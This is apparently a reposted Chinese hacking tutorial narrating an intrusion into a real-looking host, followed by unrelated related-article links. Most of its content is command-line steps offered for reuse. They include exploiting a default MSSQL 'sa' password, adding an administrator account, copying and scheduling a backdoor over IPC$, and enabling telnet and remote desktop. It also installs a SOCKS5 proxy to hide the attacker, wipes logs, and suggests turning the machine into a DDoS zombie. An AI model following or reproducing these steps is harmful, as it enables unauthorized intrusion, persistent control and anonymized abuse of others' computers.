一次详细全面的***报告
注: 肉鸡为你已经得到权限的计算机
跳板则是在肉鸡的基础上被你做过内容,以方便自已的计算机
肉鸡: 211.75.X.X
事情发现在一个深夜.外面黑的吓死人,只有我的房间还亮着灯,我穿着一件黑色的大T 恤
按照网站论坛上的提示,211.75.X.X的USER为administrato,PASSWD为空,方式IPC连接
习惯性的先PING了一下该网站
C:\>ping 211.75.X.X
Pinging iceblood.yofor.com [211.75.X.X] with 32 bytes of data:
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Ping statistics for 211.75.X.X:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in
milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
看来网站开通,那就按提示IPC连接吧
注: IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
C:\>net use \\211.75.X.X\IPC$ "" /user:"admintitrators"
系统发生1326错误
登陆失败:未知的用户名或错误密码
我晕,看来前来的兄弟将密码改了,还是自已动手吧
流光出场,看看可以扫到点什么有用的东东.十分钟后,流光扫描报告显示
PORT-> 主机 211.75.X.X 端口 0139 ...开放
PORT-> 主机 211.75.X.X 端口 0443 ...开放
PORT-> 主机 211.75.X.X 端口 080 ...开放
PORT-> 主机 211.75.X.X 端口 1433 ...开放
.........
最下面探测到了流光的默认MSSQL密码为SA
哈哈,这回有的玩了
打开SuperSQLEXEC,在IP中填上211.75.X.X,在USER中输入sa ,连接
稍等一会,出来了,我们现在利用了MSSQL的默认密码这个漏洞进入倒对方的系统了
c:\net user
admin administrator user aa bb
lqh test xxxxx ldir like
看来这台机子上有不少USER,反正也不差咱们一个了,
c:\net user kawen kawen /add
命令成功
c:\net localgroup administrators kawen /add
命令成功
OK,我们现在已成功的将KAWEN这个用户名加到管理员中去了.
退出SQL,我们现在又要转到IPC这边来了,打开DOS
C:\>net use \\211.75.X.X\IPC$ "kawen" /user:"kawen"
命令完成
呵呵,看到没有,我们已经和对方IPC上了
现在要做的就是提升权限了,当然你可以用DameWare Mini Remote Control直接通过图形方式连上对方的计算机,就像3389一样.
C:\>copy srv.exe \\211.75.X.X\admin$
C:\>net time \\211.75.X.X
C:\>at \\211.75.X.X 11:05 srv.exe
以上三步是我们要启动可以打开99端口的后门软件SRV.EXE
C:\>net time \\211.75.X.X
再查查到时间没有?如果211.75.X.X 的当前时间是 2002/6/1 上午 11:05,那就准备开始下面的命令
C:\>telnet 211.75.X.X 99
C:\WINNT\system32
成功了,不过SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务,也就是打开对方的23端口
copy ntlm.exe \\211.75.X.X\admin$
OK,我们直接运行C:\WINNT\system32>ntlm
当出现"DONE"的时候,就说明已经启动正常
然后我们使用net start telnet直接启动TELNET服务
OK,现在我们已经利用IPC进来了
下一步就是开一个3389端口,可以以图形方式直接登陆
请按以下步骤输入开启3389
c:\>query user
c:\>echo [Components] > c:\kawen
c:\>echo TSEnable = on >> c:\kawen
//这是建立无人参与的安装参数
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\kawen /q
如果没有意外的话,几分钟计算机就会重启, 我们就可以利用3389的客户端连上去了
到这里为止我们通过MSSQL,IPC,99端口及TELNET后后又建立了3389端口,现在这台计算机我们已基本控制了,现在还要做的就是建立一个代理服务器,以便我们可以在网上做到踏雪无痕,
代理服务器的首选应该是SkSockServer
怎么上传到我们控制的计算机中呢,其实有多种方法,我们不是开了对方的23端口了吗
telnet上去
TELNET 211.75.X.X
C:\WINNT\SYSTEM32\NET SHARE C$
这一条命令是开对方的共享,然后在本机上的开始运行中直接键入\\211.75.X.X就可以连上了,将SkSockServer拖到对方的C盘中就可以了.另外我们还可以利用流光的种植者直接种上去,也很简单
明白了吧
传上去后
c:\winnt\system32\sksockserver -install
开始安装SKSOCKSERVER
c:\winnt\system32\sksockserver -config starttype 2
c:\winnt\system32\sksockserver -config port 8888
c:\winnt\system32\net start skserver
这样我们就开启了一个端口为8888的SOCK5代理服务器,放在你的QQ上用吧
现在算来,该做的也差不多了,是到要走的时候了,清扫一下吧
这一步在这里比较简单了,推荐使用SSSO-Friend,一款图形界面的软件,他会帮你清掉你的PP,很简单
要的话联系我吧或是到down.chinaehacker.net下载
到这里教程也完了
总结一下,我们用了SQL,IPC,共享,开了99端口,23端口,3389端口,最后还做了一个SOCK5的代理服务器.其实运用上面的手法,你还可以做TFTP服务器,做成用于DDOS***的傀儡机器等等.没什么技术含量,只是想告诉各位一个最简单的道理,多看书,多运用,将本身不相关的东西相连起来,就会成为一个完整的圆.
转载于:https://blog.51cto.com/caixj/620072
一次详细全面的***报告相关推荐
- 数据结构--链栈的c语言实现(超详细注释/实验报告)
数据结构–链栈的c语言实现(超详细注释/实验报告) 知识小回顾 栈(Stack)作为一种限定性线性表,是将线性表的插入和删除操作限制为仅在表的一端进行,通常将表中允许进行插入.删除操作的一端成为栈顶( ...
- 针对“扫雷”游戏,完成详细逆向复现报告
都是主人的 3.1针对"扫雷"游戏,完成详细逆向复现报告 首先,要在CE中打开扫雷进程 (1)找出"雷数"."笑脸"和"计时器&q ...
- POJ 1057 File Mapping 最详细的解题报告
题目来源:POJ 1057 File Mapping 题目大意:像我的电脑那样显示文件夹和文件信息,其中在同一级目录内,文件夹排在文件的前面并且文件夹的顺序不变,同一级目录中文件按字母序排列.文件以' ...
- hihoCoder 1052 基因工程 最详细的解题报告
题目来源:基因工程 解题思路:假设基因序列长度为N,则需要计算基因序列前K个和后K个相同所需要的最少改变次数sum. 假设基因序列为 ATACGTCT (即M=8),K=6:interval=M-K= ...
- hihoCoder 1114 小Hi小Ho的惊天大作战:扫雷·一 最详细的解题报告
题目来源:小Hi小Ho的惊天大作战:扫雷·一 解题思路:因为只要确定了第一个是否有地雷就可以推算出后面是否有地雷(要么为0,要么为1,如果不是这两个值就说明这个方案行不通),如果两种可能中有一种成功, ...
- win10查看电池详细使用情况报告(查看损耗等)以及无法启动服务问题
以管理员运行"命令提示符",输入命令: Powercfg /batteryreport 复制路径,打开即可看到. 如果无法启动服务 在服务里将Diagnostic Policy S ...
- 关于使用CE(cheat engine)的扫雷详细逆向复现报告
分析"初级"."中级"和"高级"的棋盘内存地址范围: 分析:分析:扫雷有空白和数字,我们可以选择未知的初始值进行扫描,然后把重置后的数值与之 ...
- Java web编写在线论坛系统(bbs) 完整源码 附带详细的设计报告
今天为大家分享一个java语言编写的在线论坛系统,目前系统功能已经很全面,后续会进一步完善.整个系统界面漂亮,有完整得源码,希望大家可以喜欢.喜欢的帮忙点赞和关注.一起编程.一起进步 开发环境 开发语 ...
- 异步电机直接转矩控制仿真模型/DSC/附详细精美报告
异步电机直接转矩控制仿真模型/DSC/附详细精美报告 模型使用matlab21a搭建,低版本无法打开 此模型送6600字详细原创课程报告,仿真图均有精美编辑,排版公整. ID:348566926384 ...
最新文章
- document.getElementById 学习总结
- mac 端口占用_第二章 感受Mac 之美-惊艳从Mac 外设开始,一周后的使用感受
- 启动计算机引导win10,教您win10引导项丢失怎么办
- 10 分钟从零搭建个人博客
- *【CodeForces - 799C】Fountains (线段树 或 树状数组,类似二元组问题)
- centos 自动补全c语言,YouCompleteMe自动补全C语言大型项目 ycm
- 单片机按键“消抖”的思考
- 【干货】2021年重点行业薪酬趋势指南.pdf(附下载链接)
- html中右边线条怎么写,html5 三角形的线条怎么写
- php 扩展加载顺序,关于PHP中extension加载顺序问题的解决方法
- 【重点】LeetCode 143. Reorder List
- MongoDB vs MySQL,哪个效率更高?
- 批量修改mac系统文件的可读写权限
- qt 按钮 gradient_少造轮子!推荐一个Qt的Python组件库
- 跑毒的乌龟-0 : 随机漫步
- Android代码里面设置字体颜色的三种方法
- vue3小兔鲜儿项目文档,视频
- 检测键盘的 CAPS LOCK 开关
- 快速理解旋转运动公式
- 基层干部计算机培训方案,基层管理干部培训方案
热门文章
- VTK:图表之EdgeListIterator
- VTK:Filtering之ConnectivityFilterDemo
- OpenCV用于快速边缘检测的结构化森林
- Qt Creator检查代码语法
- OpenGL Single Point单点移动三角形的实例
- C++实现array right rotation数组右旋转(附完整源码)
- C语言实现冒泡排序(bubble排序)算法(附完整源码)
- QT的QScriptContext类的使用
- QT的QModbusRequest类的使用
- 优化器(AdaGrad,AdaDelta,RmsProp,Adam,Nadam,Nesterovs,Sgd,momentum)